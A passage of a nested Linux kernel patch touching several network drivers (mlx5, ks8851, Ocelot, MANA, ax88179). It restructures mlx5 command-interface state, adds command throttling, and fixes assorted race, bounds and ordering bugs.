+ 	status = ent->status;
+@@ -1558,15 +1571,15 @@ void mlx5_cmd_allowed_opcode(struct mlx5_core_dev *dev, u16 opcode)
+ 	struct mlx5_cmd *cmd = &dev->cmd;
+ 	int i;
+ 
+-	for (i = 0; i < cmd->max_reg_cmds; i++)
+-		down(&cmd->sem);
+-	down(&cmd->pages_sem);
++	for (i = 0; i < cmd->vars.max_reg_cmds; i++)
++		down(&cmd->vars.sem);
++	down(&cmd->vars.pages_sem);
+ 
+ 	cmd->allowed_opcode = opcode;
+ 
+-	up(&cmd->pages_sem);
+-	for (i = 0; i < cmd->max_reg_cmds; i++)
+-		up(&cmd->sem);
++	up(&cmd->vars.pages_sem);
++	for (i = 0; i < cmd->vars.max_reg_cmds; i++)
++		up(&cmd->vars.sem);
+ }
+ 
+ static void mlx5_cmd_change_mod(struct mlx5_core_dev *dev, int mode)
+@@ -1574,15 +1587,15 @@ static void mlx5_cmd_change_mod(struct mlx5_core_dev *dev, int mode)
+ 	struct mlx5_cmd *cmd = &dev->cmd;
+ 	int i;
+ 
+-	for (i = 0; i < cmd->max_reg_cmds; i++)
+-		down(&cmd->sem);
+-	down(&cmd->pages_sem);
++	for (i = 0; i < cmd->vars.max_reg_cmds; i++)
++		down(&cmd->vars.sem);
++	down(&cmd->vars.pages_sem);
+ 
+ 	cmd->mode = mode;
+ 
+-	up(&cmd->pages_sem);
+-	for (i = 0; i < cmd->max_reg_cmds; i++)
+-		up(&cmd->sem);
++	up(&cmd->vars.pages_sem);
++	for (i = 0; i < cmd->vars.max_reg_cmds; i++)
++		up(&cmd->vars.sem);
+ }
+ 
+ static int cmd_comp_notifier(struct notifier_block *nb,
+@@ -1641,7 +1654,7 @@ static void mlx5_cmd_comp_handler(struct mlx5_core_dev *dev, u64 vec, bool force
+ 
+ 	/* there can be at most 32 command queues */
+ 	vector = vec & 0xffffffff;
+-	for (i = 0; i < (1 << cmd->log_sz); i++) {
++	for (i = 0; i < (1 << cmd->vars.log_sz); i++) {
+ 		if (test_bit(i, &vector)) {
+ 			ent = cmd->ent_arr[i];
+ 
+@@ -1730,7 +1743,7 @@ static void mlx5_cmd_trigger_completions(struct mlx5_core_dev *dev)
+ 	/* wait for pending handlers to complete */
+ 	mlx5_eq_synchronize_cmd_irq(dev);
+ 	spin_lock_irqsave(&dev->cmd.alloc_lock, flags);
+-	vector = ~dev->cmd.bitmask & ((1ul << (1 << dev->cmd.log_sz)) - 1);
++	vector = ~dev->cmd.vars.bitmask & ((1ul << (1 << dev->cmd.vars.log_sz)) - 1);
+ 	if (!vector)
+ 		goto no_trig;
+ 
+@@ -1739,14 +1752,14 @@ static void mlx5_cmd_trigger_completions(struct mlx5_core_dev *dev)
+ 	 * to guarantee pending commands will not get freed in the meanwhile.
+ 	 * For that reason, it also has to be done inside the alloc_lock.
+ 	 */
+-	for_each_set_bit(i, &bitmask, (1 << cmd->log_sz))
++	for_each_set_bit(i, &bitmask, (1 << cmd->vars.log_sz))
+ 		cmd_ent_get(cmd->ent_arr[i]);
+ 	vector |= MLX5_TRIGGERED_CMD_COMP;
+ 	spin_unlock_irqrestore(&dev->cmd.alloc_lock, flags);
+ 
+ 	mlx5_core_dbg(dev, "vector 0x%llx\n", vector);
+ 	mlx5_cmd_comp_handler(dev, vector, true);
+-	for_each_set_bit(i, &bitmask, (1 << cmd->log_sz))
++	for_each_set_bit(i, &bitmask, (1 << cmd->vars.log_sz))
+ 		cmd_ent_put(cmd->ent_arr[i]);
+ 	return;
+ 
+@@ -1759,22 +1772,22 @@ void mlx5_cmd_flush(struct mlx5_core_dev *dev)
+ 	struct mlx5_cmd *cmd = &dev->cmd;
+ 	int i;
+ 
+-	for (i = 0; i < cmd->max_reg_cmds; i++) {
+-		while (down_trylock(&cmd->sem)) {
++	for (i = 0; i < cmd->vars.max_reg_cmds; i++) {
++		while (down_trylock(&cmd->vars.sem)) {
+ 			mlx5_cmd_trigger_completions(dev);
+ 			cond_resched();
+ 		}
+ 	}
+ 
+-	while (down_trylock(&cmd->pages_sem)) {
++	while (down_trylock(&cmd->vars.pages_sem)) {
+ 		mlx5_cmd_trigger_completions(dev);
+ 		cond_resched();
+ 	}
+ 
+ 	/* Unlock cmdif */
+-	up(&cmd->pages_sem);
+-	for (i = 0; i < cmd->max_reg_cmds; i++)
+-		up(&cmd->sem);
++	up(&cmd->vars.pages_sem);
++	for (i = 0; i < cmd->vars.max_reg_cmds; i++)
++		up(&cmd->vars.sem);
+ }
+ 
+ static struct mlx5_cmd_msg *alloc_msg(struct mlx5_core_dev *dev, int in_size,
+@@ -1817,7 +1830,7 @@ cache_miss:
+ 
+ static int is_manage_pages(void *in)
+ {
+-	return MLX5_GET(mbox_in, in, opcode) == MLX5_CMD_OP_MANAGE_PAGES;
++	return in_to_opcode(in) == MLX5_CMD_OP_MANAGE_PAGES;
+ }
+ 
+ /*  Notes:
+@@ -1828,8 +1841,9 @@ static int cmd_exec(struct mlx5_core_dev *dev, void *in, int in_size, void *out,
+ 		    int out_size, mlx5_cmd_cbk_t callback, void *context,
+ 		    bool force_polling)
+ {
+-	u16 opcode = MLX5_GET(mbox_in, in, opcode);
+ 	struct mlx5_cmd_msg *inb, *outb;
++	u16 opcode = in_to_opcode(in);
++	bool throttle_op;
+ 	int pages_queue;
+ 	gfp_t gfp;
+ 	u8 token;
+@@ -1838,13 +1852,21 @@ static int cmd_exec(struct mlx5_core_dev *dev, void *in, int in_size, void *out,
+ 	if (mlx5_cmd_is_down(dev) || !opcode_allowed(&dev->cmd, opcode))
+ 		return -ENXIO;
+ 
++	throttle_op = mlx5_cmd_is_throttle_opcode(opcode);
++	if (throttle_op) {
++		/* atomic context may not sleep */
++		if (callback)
++			return -EINVAL;
++		down(&dev->cmd.vars.throttle_sem);
++	}
++
+ 	pages_queue = is_manage_pages(in);
+ 	gfp = callback ? GFP_ATOMIC : GFP_KERNEL;
+ 
+ 	inb = alloc_msg(dev, in_size, gfp);
+ 	if (IS_ERR(inb)) {
+ 		err = PTR_ERR(inb);
+-		return err;
++		goto out_up;
+ 	}
+ 
+ 	token = alloc_token(&dev->cmd);
+@@ -1878,6 +1900,9 @@ out_out:
+ 	mlx5_free_cmd_msg(dev, outb);
+ out_in:
+ 	free_msg(dev, inb);
++out_up:
++	if (throttle_op)
++		up(&dev->cmd.vars.throttle_sem);
+ 	return err;
+ }
+ 
+@@ -1952,8 +1977,8 @@ static int cmd_status_err(struct mlx5_core_dev *dev, int err, u16 opcode, u16 op
+ int mlx5_cmd_do(struct mlx5_core_dev *dev, void *in, int in_size, void *out, int out_size)
+ {
+ 	int err = cmd_exec(dev, in, in_size, out, out_size, NULL, NULL, false);
+-	u16 opcode = MLX5_GET(mbox_in, in, opcode);
+ 	u16 op_mod = MLX5_GET(mbox_in, in, op_mod);
++	u16 opcode = in_to_opcode(in);
+ 
+ 	return cmd_status_err(dev, err, opcode, op_mod, out);
+ }
+@@ -1998,8 +2023,8 @@ int mlx5_cmd_exec_polling(struct mlx5_core_dev *dev, void *in, int in_size,
+ 			  void *out, int out_size)
+ {
+ 	int err = cmd_exec(dev, in, in_size, out, out_size, NULL, NULL, true);
+-	u16 opcode = MLX5_GET(mbox_in, in, opcode);
+ 	u16 op_mod = MLX5_GET(mbox_in, in, op_mod);
++	u16 opcode = in_to_opcode(in);
+ 
+ 	err = cmd_status_err(dev, err, opcode, op_mod, out);
+ 	return mlx5_cmd_check(dev, err, in, out);
+@@ -2051,7 +2076,7 @@ int mlx5_cmd_exec_cb(struct mlx5_async_ctx *ctx, void *in, int in_size,
+ 
+ 	work->ctx = ctx;
+ 	work->user_callback = callback;
+-	work->opcode = MLX5_GET(mbox_in, in, opcode);
++	work->opcode = in_to_opcode(in);
+ 	work->op_mod = MLX5_GET(mbox_in, in, op_mod);
+ 	work->out = out;
+ 	if (WARN_ON(!atomic_inc_not_zero(&ctx->num_inflight)))
+@@ -2187,16 +2212,16 @@ int mlx5_cmd_init(struct mlx5_core_dev *dev)
+ 		goto err_free_pool;
+ 
+ 	cmd_l = ioread32be(&dev->iseg->cmdq_addr_l_sz) & 0xff;
+-	cmd->log_sz = cmd_l >> 4 & 0xf;
+-	cmd->log_stride = cmd_l & 0xf;
+-	if (1 << cmd->log_sz > MLX5_MAX_COMMANDS) {
++	cmd->vars.log_sz = cmd_l >> 4 & 0xf;
++	cmd->vars.log_stride = cmd_l & 0xf;
++	if (1 << cmd->vars.log_sz > MLX5_MAX_COMMANDS) {
+ 		mlx5_core_err(dev, "firmware reports too many outstanding commands %d\n",
+-			      1 << cmd->log_sz);
++			      1 << cmd->vars.log_sz);
+ 		err = -EINVAL;
+ 		goto err_free_page;
+ 	}
+ 
+-	if (cmd->log_sz + cmd->log_stride > MLX5_ADAPTER_PAGE_SHIFT) {
++	if (cmd->vars.log_sz + cmd->vars.log_stride > MLX5_ADAPTER_PAGE_SHIFT) {
+ 		mlx5_core_err(dev, "command queue size overflow\n");
+ 		err = -EINVAL;
+ 		goto err_free_page;
+@@ -2204,13 +2229,13 @@ int mlx5_cmd_init(struct mlx5_core_dev *dev)
+ 
+ 	cmd->state = MLX5_CMDIF_STATE_DOWN;
+ 	cmd->checksum_disabled = 1;
+-	cmd->max_reg_cmds = (1 << cmd->log_sz) - 1;
+-	cmd->bitmask = (1UL << cmd->max_reg_cmds) - 1;
++	cmd->vars.max_reg_cmds = (1 << cmd->vars.log_sz) - 1;
++	cmd->vars.bitmask = (1UL << cmd->vars.max_reg_cmds) - 1;
+ 
+-	cmd->cmdif_rev = ioread32be(&dev->iseg->cmdif_rev_fw_sub) >> 16;
+-	if (cmd->cmdif_rev > CMD_IF_REV) {
++	cmd->vars.cmdif_rev = ioread32be(&dev->iseg->cmdif_rev_fw_sub) >> 16;
++	if (cmd->vars.cmdif_rev > CMD_IF_REV) {
+ 		mlx5_core_err(dev, "driver does not support command interface version. driver %d, firmware %d\n",
+-			      CMD_IF_REV, cmd->cmdif_rev);
++			      CMD_IF_REV, cmd->vars.cmdif_rev);
+ 		err = -EOPNOTSUPP;
+ 		goto err_free_page;
+ 	}
+@@ -2220,8 +2245,9 @@ int mlx5_cmd_init(struct mlx5_core_dev *dev)
+ 	for (i = 0; i < MLX5_CMD_OP_MAX; i++)
+ 		spin_lock_init(&cmd->stats[i].lock);
+ 
+-	sema_init(&cmd->sem, cmd->max_reg_cmds);
+-	sema_init(&cmd->pages_sem, 1);
++	sema_init(&cmd->vars.sem, cmd->vars.max_reg_cmds);
++	sema_init(&cmd->vars.pages_sem, 1);
++	sema_init(&cmd->vars.throttle_sem, DIV_ROUND_UP(cmd->vars.max_reg_cmds, 2));
+ 
+ 	cmd_h = (u32)((u64)(cmd->dma) >> 32);
+ 	cmd_l = (u32)(cmd->dma);
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/debugfs.c b/drivers/net/ethernet/mellanox/mlx5/core/debugfs.c
+index bb95b40d25eb5..e0b0729e238c1 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/debugfs.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/debugfs.c
+@@ -176,8 +176,8 @@ static ssize_t slots_read(struct file *filp, char __user *buf, size_t count,
+ 	int ret;
+ 
+ 	cmd = filp->private_data;
+-	weight = bitmap_weight(&cmd->bitmask, cmd->max_reg_cmds);
+-	field = cmd->max_reg_cmds - weight;
++	weight = bitmap_weight(&cmd->vars.bitmask, cmd->vars.max_reg_cmds);
++	field = cmd->vars.max_reg_cmds - weight;
+ 	ret = snprintf(tbuf, sizeof(tbuf), "%d\n", field);
+ 	return simple_read_from_buffer(buf, count, pos, tbuf, ret);
+ }
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/diag/fw_tracer.c b/drivers/net/ethernet/mellanox/mlx5/core/diag/fw_tracer.c
+index 374c0011a127b..3ba54ffa54bfe 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/diag/fw_tracer.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/diag/fw_tracer.c
+@@ -691,7 +691,7 @@ static void mlx5_fw_tracer_handle_traces(struct work_struct *work)
+ 
+ 	while (block_timestamp > tracer->last_timestamp) {
+ 		/* Check block override if it's not the first block */
+-		if (!tracer->last_timestamp) {
++		if (tracer->last_timestamp) {
+ 			u64 *ts_event;
+ 			/* To avoid block override be the HW in case of buffer
+ 			 * wraparound, the time stamp of the previous block
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/en/fs_tt_redirect.c b/drivers/net/ethernet/mellanox/mlx5/core/en/fs_tt_redirect.c
+index be83ad9db82a4..e1283531e0b81 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/en/fs_tt_redirect.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/en/fs_tt_redirect.c
+@@ -154,6 +154,7 @@ static int fs_udp_create_groups(struct mlx5e_flow_table *ft, enum fs_udp_type ty
+ 	in = kvzalloc(inlen, GFP_KERNEL);
+ 	if  (!in || !ft->g) {
+ 		kfree(ft->g);
++		ft->g = NULL;
+ 		kvfree(in);
+ 		return -ENOMEM;
+ 	}
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/en/tc_tun.c b/drivers/net/ethernet/mellanox/mlx5/core/en/tc_tun.c
+index 4db0483c066a8..83bb0811e7741 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/en/tc_tun.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/en/tc_tun.c
+@@ -300,6 +300,9 @@ int mlx5e_tc_tun_create_header_ipv4(struct mlx5e_priv *priv,
+ 	if (err)
+ 		goto destroy_neigh_entry;
+ 
++	e->encap_size = ipv4_encap_size;
++	e->encap_header = encap_header;
++
+ 	if (!(nud_state & NUD_VALID)) {
+ 		neigh_event_send(attr.n, NULL);
+ 		/* the encap entry will be made valid on neigh update event
+@@ -319,8 +322,6 @@ int mlx5e_tc_tun_create_header_ipv4(struct mlx5e_priv *priv,
+ 		goto destroy_neigh_entry;
+ 	}
+ 
+-	e->encap_size = ipv4_encap_size;
+-	e->encap_header = encap_header;
+ 	e->flags |= MLX5_ENCAP_ENTRY_VALID;
+ 	mlx5e_rep_queue_neigh_stats_work(netdev_priv(attr.out_dev));
+ 	mlx5e_route_lookup_ipv4_put(&attr);
+@@ -403,12 +404,16 @@ int mlx5e_tc_tun_update_header_ipv4(struct mlx5e_priv *priv,
+ 	if (err)
+ 		goto free_encap;
+ 
++	e->encap_size = ipv4_encap_size;
++	kfree(e->encap_header);
++	e->encap_header = encap_header;
++
+ 	if (!(nud_state & NUD_VALID)) {
+ 		neigh_event_send(attr.n, NULL);
+ 		/* the encap entry will be made valid on neigh update event
+ 		 * and not used before that.
+ 		 */
+-		goto free_encap;
++		goto release_neigh;
+ 	}
+ 
+ 	memset(&reformat_params, 0, sizeof(reformat_params));
+@@ -422,10 +427,6 @@ int mlx5e_tc_tun_update_header_ipv4(struct mlx5e_priv *priv,
+ 		goto free_encap;
+ 	}
+ 
+-	e->encap_size = ipv4_encap_size;
+-	kfree(e->encap_header);
+-	e->encap_header = encap_header;
+-
+ 	e->flags |= MLX5_ENCAP_ENTRY_VALID;
+ 	mlx5e_rep_queue_neigh_stats_work(netdev_priv(attr.out_dev));
+ 	mlx5e_route_lookup_ipv4_put(&attr);
+@@ -567,6 +568,9 @@ int mlx5e_tc_tun_create_header_ipv6(struct mlx5e_priv *priv,
+ 	if (err)
+ 		goto destroy_neigh_entry;
+ 
++	e->encap_size = ipv6_encap_size;
++	e->encap_header = encap_header;
++
+ 	if (!(nud_state & NUD_VALID)) {
+ 		neigh_event_send(attr.n, NULL);
+ 		/* the encap entry will be made valid on neigh update event
+@@ -586,8 +590,6 @@ int mlx5e_tc_tun_create_header_ipv6(struct mlx5e_priv *priv,
+ 		goto destroy_neigh_entry;
+ 	}
+ 
+-	e->encap_size = ipv6_encap_size;
+-	e->encap_header = encap_header;
+ 	e->flags |= MLX5_ENCAP_ENTRY_VALID;
+ 	mlx5e_rep_queue_neigh_stats_work(netdev_priv(attr.out_dev));
+ 	mlx5e_route_lookup_ipv6_put(&attr);
+@@ -669,12 +671,16 @@ int mlx5e_tc_tun_update_header_ipv6(struct mlx5e_priv *priv,
+ 	if (err)
+ 		goto free_encap;
+ 
++	e->encap_size = ipv6_encap_size;
++	kfree(e->encap_header);
++	e->encap_header = encap_header;
++
+ 	if (!(nud_state & NUD_VALID)) {
+ 		neigh_event_send(attr.n, NULL);
+ 		/* the encap entry will be made valid on neigh update event
+ 		 * and not used before that.
+ 		 */
+-		goto free_encap;
++		goto release_neigh;
+ 	}
+ 
+ 	memset(&reformat_params, 0, sizeof(reformat_params));
+@@ -688,10 +694,6 @@ int mlx5e_tc_tun_update_header_ipv6(struct mlx5e_priv *priv,
+ 		goto free_encap;
+ 	}
+ 
+-	e->encap_size = ipv6_encap_size;
+-	kfree(e->encap_header);
+-	e->encap_header = encap_header;
+-
+ 	e->flags |= MLX5_ENCAP_ENTRY_VALID;
+ 	mlx5e_rep_queue_neigh_stats_work(netdev_priv(attr.out_dev));
+ 	mlx5e_route_lookup_ipv6_put(&attr);
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/en_ethtool.c b/drivers/net/ethernet/mellanox/mlx5/core/en_ethtool.c
+index eeba91d9c5211..ceeb23f478e15 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/en_ethtool.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/en_ethtool.c
+@@ -49,7 +49,7 @@ void mlx5e_ethtool_get_drvinfo(struct mlx5e_priv *priv,
+ 	count = snprintf(drvinfo->fw_version, sizeof(drvinfo->fw_version),
+ 			 "%d.%d.%04d (%.16s)", fw_rev_maj(mdev),
+ 			 fw_rev_min(mdev), fw_rev_sub(mdev), mdev->board_id);
+-	if (count == sizeof(drvinfo->fw_version))
++	if (count >= sizeof(drvinfo->fw_version))
+ 		snprintf(drvinfo->fw_version, sizeof(drvinfo->fw_version),
+ 			 "%d.%d.%04d", fw_rev_maj(mdev),
+ 			 fw_rev_min(mdev), fw_rev_sub(mdev));
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/en_rep.c b/drivers/net/ethernet/mellanox/mlx5/core/en_rep.c
+index 2653cb96c3105..5aeca9534f15a 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/en_rep.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/en_rep.c
+@@ -76,7 +76,7 @@ static void mlx5e_rep_get_drvinfo(struct net_device *dev,
+ 	count = snprintf(drvinfo->fw_version, sizeof(drvinfo->fw_version),
+ 			 "%d.%d.%04d (%.16s)", fw_rev_maj(mdev),
+ 			 fw_rev_min(mdev), fw_rev_sub(mdev), mdev->board_id);
+-	if (count == sizeof(drvinfo->fw_version))
++	if (count >= sizeof(drvinfo->fw_version))
+ 		snprintf(drvinfo->fw_version, sizeof(drvinfo->fw_version),
+ 			 "%d.%d.%04d", fw_rev_maj(mdev),
+ 			 fw_rev_min(mdev), fw_rev_sub(mdev));
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/vport.c b/drivers/net/ethernet/mellanox/mlx5/core/vport.c
+index d5c3173250309..3f68e3198aa64 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/vport.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/vport.c
+@@ -277,7 +277,7 @@ int mlx5_query_nic_vport_mac_list(struct mlx5_core_dev *dev,
+ 		req_list_size = max_list_size;
+ 	}
+ 
+-	out_sz = MLX5_ST_SZ_BYTES(query_nic_vport_context_in) +
++	out_sz = MLX5_ST_SZ_BYTES(query_nic_vport_context_out) +
+ 			req_list_size * MLX5_ST_SZ_BYTES(mac_address_layout);
+ 
+ 	out = kvzalloc(out_sz, GFP_KERNEL);
+diff --git a/drivers/net/ethernet/micrel/ks8851.h b/drivers/net/ethernet/micrel/ks8851.h
+index fecd43754cead..e5ec0a363aff8 100644
+--- a/drivers/net/ethernet/micrel/ks8851.h
++++ b/drivers/net/ethernet/micrel/ks8851.h
+@@ -350,6 +350,8 @@ union ks8851_tx_hdr {
+  * @rxd: Space for receiving SPI data, in DMA-able space.
+  * @txd: Space for transmitting SPI data, in DMA-able space.
+  * @msg_enable: The message flags controlling driver output (see ethtool).
++ * @tx_space: Free space in the hardware TX buffer (cached copy of KS_TXMIR).
++ * @queued_len: Space required in hardware TX buffer for queued packets in txq.
+  * @fid: Incrementing frame id tag.
+  * @rc_ier: Cached copy of KS_IER.
+  * @rc_ccr: Cached copy of KS_CCR.
+@@ -399,6 +401,7 @@ struct ks8851_net {
+ 	struct work_struct	rxctrl_work;
+ 
+ 	struct sk_buff_head	txq;
++	unsigned int		queued_len;
+ 
+ 	struct eeprom_93cx6	eeprom;
+ 	struct regulator	*vdd_reg;
+diff --git a/drivers/net/ethernet/micrel/ks8851_common.c b/drivers/net/ethernet/micrel/ks8851_common.c
+index cfbc900d4aeb9..0bf13b38b8f5b 100644
+--- a/drivers/net/ethernet/micrel/ks8851_common.c
++++ b/drivers/net/ethernet/micrel/ks8851_common.c
+@@ -362,16 +362,18 @@ static irqreturn_t ks8851_irq(int irq, void *_ks)
+ 		handled |= IRQ_RXPSI;
+ 
+ 	if (status & IRQ_TXI) {
+-		handled |= IRQ_TXI;
++		unsigned short tx_space = ks8851_rdreg16(ks, KS_TXMIR);
+ 
+-		/* no lock here, tx queue should have been stopped */
++		netif_dbg(ks, intr, ks->netdev,
++			  "%s: txspace %d\n", __func__, tx_space);
+ 
+-		/* update our idea of how much tx space is available to the
+-		 * system */
+-		ks->tx_space = ks8851_rdreg16(ks, KS_TXMIR);
++		spin_lock(&ks->statelock);
++		ks->tx_space = tx_space;
++		if (netif_queue_stopped(ks->netdev))
++			netif_wake_queue(ks->netdev);
++		spin_unlock(&ks->statelock);
+ 
+-		netif_dbg(ks, intr, ks->netdev,
+-			  "%s: txspace %d\n", __func__, ks->tx_space);
++		handled |= IRQ_TXI;
+ 	}
+ 
+ 	if (status & IRQ_RXI)
+@@ -414,9 +416,6 @@ static irqreturn_t ks8851_irq(int irq, void *_ks)
+ 	if (status & IRQ_LCI)
+ 		mii_check_link(&ks->mii);
+ 
+-	if (status & IRQ_TXI)
+-		netif_wake_queue(ks->netdev);
+-
+ 	return IRQ_HANDLED;
+ }
+ 
+@@ -500,6 +499,7 @@ static int ks8851_net_open(struct net_device *dev)
+ 	ks8851_wrreg16(ks, KS_ISR, ks->rc_ier);
+ 	ks8851_wrreg16(ks, KS_IER, ks->rc_ier);
+ 
++	ks->queued_len = 0;
+ 	netif_start_queue(ks->netdev);
+ 
+ 	netif_dbg(ks, ifup, ks->netdev, "network device up\n");
+diff --git a/drivers/net/ethernet/micrel/ks8851_spi.c b/drivers/net/ethernet/micrel/ks8851_spi.c
+index 70bc7253454f6..88e26c120b483 100644
+--- a/drivers/net/ethernet/micrel/ks8851_spi.c
++++ b/drivers/net/ethernet/micrel/ks8851_spi.c
+@@ -286,6 +286,18 @@ static void ks8851_wrfifo_spi(struct ks8851_net *ks, struct sk_buff *txp,
+ 		netdev_err(ks->netdev, "%s: spi_sync() failed\n", __func__);
+ }
+ 
++/**
++ * calc_txlen - calculate size of message to send packet
++ * @len: Length of data
++ *
++ * Returns the size of the TXFIFO message needed to send
++ * this packet.
++ */
++static unsigned int calc_txlen(unsigned int len)
++{
++	return ALIGN(len + 4, 4);
++}
++
+ /**
+  * ks8851_rx_skb_spi - receive skbuff
+  * @ks: The device state
+@@ -305,7 +317,9 @@ static void ks8851_rx_skb_spi(struct ks8851_net *ks, struct sk_buff *skb)
+  */
+ static void ks8851_tx_work(struct work_struct *work)
+ {
++	unsigned int dequeued_len = 0;
+ 	struct ks8851_net_spi *kss;
++	unsigned short tx_space;
+ 	struct ks8851_net *ks;
+ 	unsigned long flags;
+ 	struct sk_buff *txb;
+@@ -322,6 +336,8 @@ static void ks8851_tx_work(struct work_struct *work)
+ 		last = skb_queue_empty(&ks->txq);
+ 
+ 		if (txb) {
++			dequeued_len += calc_txlen(txb->len);
++
+ 			ks8851_wrreg16_spi(ks, KS_RXQCR,
+ 					   ks->rc_rxqcr | RXQCR_SDA);
+ 			ks8851_wrfifo_spi(ks, txb, last);
+@@ -332,6 +348,13 @@ static void ks8851_tx_work(struct work_struct *work)
+ 		}
+ 	}
+ 
++	tx_space = ks8851_rdreg16_spi(ks, KS_TXMIR);
++
++	spin_lock(&ks->statelock);
++	ks->queued_len -= dequeued_len;
++	ks->tx_space = tx_space;
++	spin_unlock(&ks->statelock);
++
+ 	ks8851_unlock_spi(ks, &flags);
+ }
+ 
+@@ -346,18 +369,6 @@ static void ks8851_flush_tx_work_spi(struct ks8851_net *ks)
+ 	flush_work(&kss->tx_work);
+ }
+ 
+-/**
+- * calc_txlen - calculate size of message to send packet
+- * @len: Length of data
+- *
+- * Returns the size of the TXFIFO message needed to send
+- * this packet.
+- */
+-static unsigned int calc_txlen(unsigned int len)
+-{
+-	return ALIGN(len + 4, 4);
+-}
+-
+ /**
+  * ks8851_start_xmit_spi - transmit packet using SPI
+  * @skb: The buffer to transmit
+@@ -386,16 +397,17 @@ static netdev_tx_t ks8851_start_xmit_spi(struct sk_buff *skb,
+ 
+ 	spin_lock(&ks->statelock);
+ 
+-	if (needed > ks->tx_space) {
++	if (ks->queued_len + needed > ks->tx_space) {
+ 		netif_stop_queue(dev);
+ 		ret = NETDEV_TX_BUSY;
+ 	} else {
+-		ks->tx_space -= needed;
++		ks->queued_len += needed;
+ 		skb_queue_tail(&ks->txq, skb);
+ 	}
+ 
+ 	spin_unlock(&ks->statelock);
+-	schedule_work(&kss->tx_work);
++	if (ret == NETDEV_TX_OK)
++		schedule_work(&kss->tx_work);
+ 
+ 	return ret;
+ }
+diff --git a/drivers/net/ethernet/microsoft/Kconfig b/drivers/net/ethernet/microsoft/Kconfig
+index fe4e7a7d9c0b5..8b6c4cc37c53c 100644
+--- a/drivers/net/ethernet/microsoft/Kconfig
++++ b/drivers/net/ethernet/microsoft/Kconfig
+@@ -19,6 +19,7 @@ config MICROSOFT_MANA
+ 	tristate "Microsoft Azure Network Adapter (MANA) support"
+ 	depends on PCI_MSI && X86_64
+ 	depends on PCI_HYPERV
++	select PAGE_POOL
+ 	help
+ 	  This driver supports Microsoft Azure Network Adapter (MANA).
+ 	  So far, the driver is only supported on X86_64.
+diff --git a/drivers/net/ethernet/mscc/ocelot_stats.c b/drivers/net/ethernet/mscc/ocelot_stats.c
+index 0066219bb0e89..6b95262dad904 100644
+--- a/drivers/net/ethernet/mscc/ocelot_stats.c
++++ b/drivers/net/ethernet/mscc/ocelot_stats.c
+@@ -216,10 +216,10 @@ static void ocelot_port_rmon_stats_cb(struct ocelot *ocelot, int port, void *pri
+ 	rmon_stats->hist_tx[0] = s[OCELOT_STAT_TX_64];
+ 	rmon_stats->hist_tx[1] = s[OCELOT_STAT_TX_65_127];
+ 	rmon_stats->hist_tx[2] = s[OCELOT_STAT_TX_128_255];
+-	rmon_stats->hist_tx[3] = s[OCELOT_STAT_TX_128_255];
+-	rmon_stats->hist_tx[4] = s[OCELOT_STAT_TX_256_511];
+-	rmon_stats->hist_tx[5] = s[OCELOT_STAT_TX_512_1023];
+-	rmon_stats->hist_tx[6] = s[OCELOT_STAT_TX_1024_1526];
++	rmon_stats->hist_tx[3] = s[OCELOT_STAT_TX_256_511];
++	rmon_stats->hist_tx[4] = s[OCELOT_STAT_TX_512_1023];
++	rmon_stats->hist_tx[5] = s[OCELOT_STAT_TX_1024_1526];
++	rmon_stats->hist_tx[6] = s[OCELOT_STAT_TX_1527_MAX];
+ }
+ 
+ void ocelot_port_get_rmon_stats(struct ocelot *ocelot, int port,
+diff --git a/drivers/net/usb/ax88179_178a.c b/drivers/net/usb/ax88179_178a.c
+index 4ea0e155bb0d5..5a1bf42ce1566 100644
+--- a/drivers/net/usb/ax88179_178a.c
++++ b/drivers/net/usb/ax88179_178a.c
+@@ -173,6 +173,7 @@ struct ax88179_data {
+ 	u8 in_pm;
+ 	u32 wol_supported;
+ 	u32 wolopts;
++	u8 disconnecting;
+ };
+ 
+ struct ax88179_int_data {
+@@ -208,6 +209,7 @@ static int __ax88179_read_cmd(struct usbnet *dev, u8 cmd, u16 value, u16 index,
+ {
+ 	int ret;
+ 	int (*fn)(struct usbnet *, u8, u8, u16, u16, void *, u16);
++	struct ax88179_data *ax179_data = dev->driver_priv;
+ 
+ 	BUG_ON(!dev);
+ 
+@@ -219,7 +221,7 @@ static int __ax88179_read_cmd(struct usbnet *dev, u8 cmd, u16 value, u16 index,
+ 	ret = fn(dev, cmd, USB_DIR_IN | USB_TYPE_VENDOR | USB_RECIP_DEVICE,
+ 		 value, index, data, size);
+ 
+-	if (unlikely(ret < 0))
++	if (unlikely((ret < 0) && !(ret == -ENODEV && ax179_data->disconnecting)))
+ 		netdev_warn(dev->net, "Failed to read reg index 0x%04x: %d\n",
+ 			    index, ret);
+ 
+@@ -231,6 +233,7 @@ static int __ax88179_write_cmd(struct usbnet *dev, u8 cmd, u16 value, u16 index,
+ {
+ 	int ret;
+ 	int (*fn)(struct usbnet *, u8, u8, u16, u16, const void *, u16);
++	struct ax88179_data *ax179_data = dev->driver_priv;
+ 
+ 	BUG_ON(!dev);
+ 
+@@ -242,7 +245,7 @@ static int __ax88179_write_cmd(struct usbnet *dev, u8 cmd, u16 value, u16 index,
+ 	ret = fn(dev, cmd, USB_DIR_OUT | USB_TYPE_VENDOR | USB_RECIP_DEVICE,
+ 		 value, index, data, size);
+ 
+-	if (unlikely(ret < 0))
++	if (unlikely((ret < 0) && !(ret == -ENODEV && ax179_data->disconnecting)))
+ 		netdev_warn(dev->net, "Failed to write reg index 0x%04x: %d\n",
+ 			    index, ret);
+ 
